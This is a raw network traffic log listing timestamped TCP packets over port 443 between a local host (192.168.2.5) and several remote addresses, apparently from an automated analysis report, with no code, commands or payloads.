                                                                                                                                                                                        Nov 24, 2024 02:13:42.372463942 CET4434977913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:42.516452074 CET4434977113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:42.516525984 CET4434977113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:42.516593933 CET49771443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:42.516802073 CET49771443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:42.516820908 CET4434977113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:42.516838074 CET49771443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:42.516844034 CET4434977113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:42.520108938 CET49780443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:42.520180941 CET4434978013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:42.520250082 CET49780443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:42.520432949 CET49780443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:42.520446062 CET4434978013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:42.580071926 CET4434977213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:42.580161095 CET4434977213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:42.580404043 CET49772443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:42.580459118 CET49772443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:42.580475092 CET4434977213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:42.580487013 CET49772443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:42.580492020 CET4434977213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:42.583879948 CET49781443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:42.583898067 CET4434978113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:42.584171057 CET49781443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:42.584366083 CET49781443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:42.584378958 CET4434978113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:43.398916006 CET49784443192.168.2.523.195.62.26
                                                                                                                                                                                        Nov 24, 2024 02:13:43.398943901 CET4434978423.195.62.26192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:43.399045944 CET49784443192.168.2.523.195.62.26
                                                                                                                                                                                        Nov 24, 2024 02:13:43.404825926 CET49784443192.168.2.523.195.62.26
                                                                                                                                                                                        Nov 24, 2024 02:13:43.404841900 CET4434978423.195.62.26192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:43.797032118 CET4434977613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:43.801168919 CET49776443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:43.801197052 CET4434977613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:43.802110910 CET49776443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:43.802117109 CET4434977613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:43.817679882 CET44349777142.250.181.100192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:43.818659067 CET49777443192.168.2.5142.250.181.100
                                                                                                                                                                                        Nov 24, 2024 02:13:43.818676949 CET44349777142.250.181.100192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:43.819730997 CET44349777142.250.181.100192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:43.819808006 CET49777443192.168.2.5142.250.181.100
                                                                                                                                                                                        Nov 24, 2024 02:13:43.821439981 CET49777443192.168.2.5142.250.181.100
                                                                                                                                                                                        Nov 24, 2024 02:13:43.821511984 CET44349777142.250.181.100192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:43.876604080 CET49777443192.168.2.5142.250.181.100
                                                                                                                                                                                        Nov 24, 2024 02:13:43.876621008 CET44349777142.250.181.100192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:43.922498941 CET49777443192.168.2.5142.250.181.100
                                                                                                                                                                                        Nov 24, 2024 02:13:44.065449953 CET4434977813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.081478119 CET49778443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.081500053 CET4434977813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.082072020 CET49778443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.082077980 CET4434977813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.087820053 CET4434977913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.088252068 CET49779443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.088277102 CET4434977913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.088771105 CET49779443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.088776112 CET4434977913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.240940094 CET4434977613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.240994930 CET4434977613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.241245985 CET49776443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.241287947 CET49776443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.241306067 CET4434977613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.241318941 CET49776443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.241334915 CET4434977613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.244517088 CET49785443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.244544983 CET4434978513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.244622946 CET49785443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.244807959 CET49785443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.244817972 CET4434978513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.300240993 CET4434978013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.300846100 CET49780443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.300880909 CET4434978013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.301354885 CET49780443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.301358938 CET4434978013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.365094900 CET4434978113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.369982004 CET49781443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.370017052 CET4434978113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.386079073 CET49781443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.386090040 CET4434978113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.499651909 CET4434977813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.499728918 CET4434977813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.499788046 CET49778443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.500416040 CET49778443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.500427961 CET4434977813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.515258074 CET49786443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.515302896 CET4434978613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.515758038 CET49786443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.517378092 CET49786443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.517407894 CET4434978613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.523019075 CET4434977913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.523092031 CET4434977913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.523197889 CET49779443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.524130106 CET49779443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.524142027 CET4434977913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.524149895 CET49779443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.524157047 CET4434977913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.531992912 CET49787443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.532006979 CET4434978713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.532123089 CET49787443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.532809973 CET49787443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.532828093 CET4434978713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.744290113 CET4434978013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.744534016 CET4434978013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.744622946 CET49780443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.754847050 CET49780443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.754869938 CET4434978013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.754894018 CET49780443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.754900932 CET4434978013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.758510113 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.758563995 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.758804083 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.758934021 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.758939981 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.808682919 CET4434978113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.808758020 CET4434978113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.808825016 CET49781443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.809113026 CET49781443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.809127092 CET4434978113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.809142113 CET49781443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.809149027 CET4434978113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.812486887 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.812521935 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:44.812594891 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.812818050 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:44.812834978 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:45.009301901 CET4434978423.195.62.26192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:45.009386063 CET49784443192.168.2.523.195.62.26
                                                                                                                                                                                        Nov 24, 2024 02:13:45.014902115 CET49784443192.168.2.523.195.62.26
                                                                                                                                                                                        Nov 24, 2024 02:13:45.014925957 CET4434978423.195.62.26192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:45.015517950 CET4434978423.195.62.26192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:45.058346033 CET49784443192.168.2.523.195.62.26
                                                                                                                                                                                        Nov 24, 2024 02:13:45.103419065 CET4434978423.195.62.26192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:45.707024097 CET4434978423.195.62.26192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:45.707101107 CET4434978423.195.62.26192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:45.707175016 CET49784443192.168.2.523.195.62.26
                                                                                                                                                                                        Nov 24, 2024 02:13:45.707434893 CET49784443192.168.2.523.195.62.26
                                                                                                                                                                                        Nov 24, 2024 02:13:45.707453012 CET4434978423.195.62.26192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:45.707465887 CET49784443192.168.2.523.195.62.26
                                                                                                                                                                                        Nov 24, 2024 02:13:45.707473040 CET4434978423.195.62.26192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:45.753611088 CET49790443192.168.2.523.195.62.26
                                                                                                                                                                                        Nov 24, 2024 02:13:45.753635883 CET4434979023.195.62.26192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:45.753715038 CET49790443192.168.2.523.195.62.26
                                                                                                                                                                                        Nov 24, 2024 02:13:45.754153013 CET49790443192.168.2.523.195.62.26
                                                                                                                                                                                        Nov 24, 2024 02:13:45.754168987 CET4434979023.195.62.26192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.027437925 CET4434978513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.083264112 CET49785443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.144587040 CET49785443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.144596100 CET4434978513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.145488977 CET49785443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.145493984 CET4434978513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.237507105 CET4434978613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.297784090 CET49786443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.310746908 CET4434978713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.349344969 CET49786443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.349365950 CET4434978613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.349858999 CET49786443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.349864960 CET4434978613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.350426912 CET49787443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.350450039 CET4434978713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.350888014 CET49787443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.350893021 CET4434978713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.472306967 CET4434978513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.472362041 CET4434978513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.472421885 CET49785443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.475487947 CET49785443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.475493908 CET4434978513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.475507021 CET49785443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.475511074 CET4434978513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.478482962 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.478513002 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.478641987 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.478760004 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.478770018 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.645653963 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.647089958 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.647113085 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.648154020 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.648158073 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.652638912 CET49795443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.652653933 CET4434979513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.653032064 CET49795443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.653527975 CET49795443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.653542042 CET4434979513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.666454077 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.667853117 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.667876005 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.668631077 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.668637037 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.690536976 CET4434978613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.690602064 CET4434978613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.690964937 CET49786443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.691025972 CET49786443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.691056013 CET4434978613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.691246033 CET49786443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.691252947 CET4434978613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.694662094 CET49796443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.694705963 CET4434979613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.694802999 CET49796443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.695014000 CET49796443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.695027113 CET4434979613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.760283947 CET4434978713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.760355949 CET4434978713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.760550022 CET49787443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.760629892 CET49787443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.760643959 CET4434978713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.760657072 CET49787443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.760662079 CET4434978713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.763039112 CET49797443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.763056993 CET4434979713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.763150930 CET49797443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.763614893 CET49797443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:46.763629913 CET4434979713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:47.027483940 CET49799443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:47.027513981 CET4434979913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:47.027581930 CET49799443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:47.028987885 CET49799443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:47.029004097 CET4434979913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:47.088653088 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:47.088844061 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:47.088896990 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:47.089178085 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:47.089201927 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:47.089216948 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:47.089224100 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:47.098526955 CET49800443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:47.098567963 CET4434980013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:47.098649025 CET49800443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:47.098794937 CET49800443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:47.098810911 CET4434980013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:47.110130072 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:47.110208035 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:47.110263109 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:47.132813931 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:47.132828951 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:47.132843018 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:47.132848978 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:47.145513058 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:47.145539045 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:47.145606041 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:47.145759106 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:47.145772934 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:47.454561949 CET4434979023.195.62.26192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:47.454632044 CET49790443192.168.2.523.195.62.26
                                                                                                                                                                                        Nov 24, 2024 02:13:47.456554890 CET49790443192.168.2.523.195.62.26
                                                                                                                                                                                        Nov 24, 2024 02:13:47.456566095 CET4434979023.195.62.26192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:47.456856012 CET4434979023.195.62.26192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:47.457995892 CET49790443192.168.2.523.195.62.26
                                                                                                                                                                                        Nov 24, 2024 02:13:47.499336004 CET4434979023.195.62.26192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.164593935 CET4434979023.195.62.26192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.164663076 CET4434979023.195.62.26192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.165455103 CET49790443192.168.2.523.195.62.26
                                                                                                                                                                                        Nov 24, 2024 02:13:48.166306019 CET49790443192.168.2.523.195.62.26
                                                                                                                                                                                        Nov 24, 2024 02:13:48.166337967 CET4434979023.195.62.26192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.166377068 CET49790443192.168.2.523.195.62.26
                                                                                                                                                                                        Nov 24, 2024 02:13:48.166392088 CET4434979023.195.62.26192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.192612886 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.193376064 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:48.193408012 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.195276022 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:48.195287943 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.528067112 CET4434979613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.528814077 CET49796443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:48.528836966 CET4434979613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.529751062 CET49796443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:48.529757977 CET4434979613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.534513950 CET4434979713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.535031080 CET49797443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:48.535053015 CET4434979713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.535557985 CET49797443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:48.535567045 CET4434979713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.540399075 CET4434979513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.548393965 CET49795443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:48.548413038 CET4434979513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.549532890 CET4434979513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.549751043 CET49795443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:48.551956892 CET49795443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:48.552026987 CET4434979513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.552396059 CET49795443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:48.552405119 CET4434979513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.594016075 CET49795443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:48.844242096 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.844315052 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.848978996 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:48.851154089 CET4434979913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.900482893 CET49799443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:48.933274031 CET49799443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:48.933284044 CET4434979913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.933425903 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:48.933425903 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:48.933464050 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.933476925 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.937280893 CET4434979913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:48.937381029 CET49799443192.168.2.513.107.246.63
